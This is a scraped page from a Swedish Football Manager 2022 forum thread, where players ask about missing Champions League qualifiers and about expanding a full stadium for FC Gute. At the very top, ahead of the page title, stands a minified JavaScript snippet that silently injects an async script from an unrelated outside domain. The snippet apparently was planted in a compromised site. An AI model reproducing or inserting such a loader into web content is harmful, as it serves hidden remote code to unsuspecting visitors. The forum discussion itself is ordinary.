;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Småfrågor – Sida 5 – Football Manager 2022 – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

[Klistrad] Småfrågor

84 Inlägg
39 Users
64 Reactions
5,719 Visningar
(@yodaism)
New Member
Blev medlem: 2 år sedan
Inlägg: 1
 

Tjena jag är ny i forumet och på FM. Jag började min första save med DIF och vann allsvenskan min första säsong men trots att jag fick ett mail om att jag hade kvalificerat mig för Champions League-kval fick jag aldrig några kvalmatcher. Nu är jag i maj min andra säsong och insåg just att jag inte har några kvalmatcher på schemat hela säsongen. Jag har en pissig dator så jag har en rätt liten spelarbas men tänkte inte att det skulle ta bort mina chanser på europaspel 🙁 


   
SvaraCitera
 Alx
(@alx)
New Member
Blev medlem: 2 år sedan
Inlägg: 4
 

Är inne på 2033 med mitt FC Gute. Har kassa på 2 miljarder och har byggt ut alla faciliteter till världsklass. Arenan är på 8974 åskådare, men det är fullsatt varje match. Finns det någon möjlighet att bygga ut mer eller är det begränsningar p.g.a. att Visby inte är så stort?

 

Vore tacksam för lite hjälp. Det förtar lite av spelglädjen om det "tar stopp" här. 


   
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 155
 
Postad av: @alx

Är inne på 2033 med mitt FC Gute. Har kassa på 2 miljarder och har byggt ut alla faciliteter till världsklass. Arenan är på 8974 åskådare, men det är fullsatt varje match. Finns det någon möjlighet att bygga ut mer eller är det begränsningar p.g.a. att Visby inte är så stort?

 

Vore tacksam för lite hjälp. Det förtar lite av spelglädjen om det "tar stopp" här. 

Har inget bra svar här, mer än att det lär gå tillslut och få bygga ny arena/bygga ut. 

Svarar endast för att berömma din resa! Inne på en liknande resa fast med Kiruna, men där vägen till framgång tagit lite längre tid. Älska Gute!


   
SvaraCitera
 Alx
(@alx)
New Member
Blev medlem: 2 år sedan
Inlägg: 4
 
Postad av: @argt-troll
Postad av: @alx

Är inne på 2033 med mitt FC Gute. Har kassa på 2 miljarder och har byggt ut alla faciliteter till världsklass. Arenan är på 8974 åskådare, men det är fullsatt varje match. Finns det någon möjlighet att bygga ut mer eller är det begränsningar p.g.a. att Visby inte är så stort?

 

Vore tacksam för lite hjälp. Det förtar lite av spelglädjen om det "tar stopp" här. 

Har inget bra svar här, mer än att det lär gå tillslut och få bygga ny arena/bygga ut. 

Svarar endast för att berömma din resa! Inne på en liknande resa fast med Kiruna, men där vägen till framgång tagit lite längre tid. Älska Gute!

Tack så mycket! Jag brukar sällan köra så här länge. Men på något vis kittlar det att se hur långt man kan ta det. Nu finns det inte så mycket att göra då det är ett självspelande piano. Det är mer fokus på egna talanger och CL :). Roligt att du också har en långkörare! 


   
SvaraCitera
Sida 5 / 5
Share: